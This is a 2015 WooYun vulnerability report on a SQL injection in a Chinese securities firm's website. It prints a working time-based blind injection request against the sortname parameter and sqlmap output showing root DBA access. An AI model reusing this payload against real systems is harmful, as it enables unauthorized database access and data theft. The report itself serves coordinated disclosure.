当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141938

漏洞标题:华金证券主站SQL注入漏洞(DBA权限/时间盲注root权限)

相关厂商:华金证券

漏洞作者: 路人甲

提交时间:2015-09-20 14:43

修复时间:2015-11-06 19:58

公开时间:2015-11-06 19:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-20: 细节已通知厂商并且等待厂商处理中
2015-09-22: 厂商已经确认,细节仅向厂商公开
2015-10-02: 细节向核心白帽子及相关领域专家公开
2015-10-12: 细节向普通白帽子公开
2015-10-22: 细节向实习白帽子公开
2015-11-06: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://**.**.**.**/
测试注入:

POST /creditTrans/searchList HTTP/1.1
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: PHPSESSID=kdmgr839vmd0vh8u6ajkj9c4s2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
module=2&page=1&rp=10&sortname=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&sortorder=desc&type=1


存在注入:

131.png

漏洞证明:

jinhua.png


权限:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #2* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: module=2&page=1&rp=10&sortname=(select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+" AND (SELECT * FROM (SELECT(SLEEP(5)))Jksr)-- xRQj/&sortorder=desc&type=1
---
[13:07:49] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.12
[13:07:49] [INFO] testing if current user is DBA
[13:07:49] [INFO] fetching current user
[13:08:11] [INFO] adjusting time delay to 1 second due to good response times
root@localhost
current user is DBA: True

修复方案:

时间盲注 就不跑了 耗时间

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-09-22 19:57

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论